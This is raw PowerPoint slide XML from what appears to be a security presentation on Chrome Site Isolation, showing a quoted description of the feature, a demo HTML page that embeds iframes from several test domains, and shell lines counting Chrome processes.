              <a:t>height</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&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>➜  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>site_isolation_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> aux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chrome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-v</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wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>➜  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>site_isolation_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> aux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chrome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-v</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wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>➜  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>site_isolation_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> aux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chrome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-v</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wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>➜  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>site_isolation_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> aux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chrome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-v</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wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>➜  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>site_isolation_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> aux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chrome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-v</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wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2491593018"/>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Site Isolation</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053192" y="1565213"/>
            <a:ext cx="10091057" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent3">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Site Isolation offers a second line of defense to make such attacks less likely to succeed. It ensures that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pages from different websites are always put into different processes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, each running in a sandbox that limits what the process is allowed to do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="2808509"/>
            <a:ext cx="12192000" cy="4049491"/>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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298580" y="2939130"/>
            <a:ext cx="11579289" cy="3853556"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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rgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>This is the parent Frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"http://externalist1.com:8080/innocent.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>width</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>height</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&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"http://externalist2.com:8080/innocent.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>width</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>height</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&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"http://externalist3.com:8080/innocent.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>width</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>height</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&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"http://externalist4.com:8080/innocent.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>width</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>height</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&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
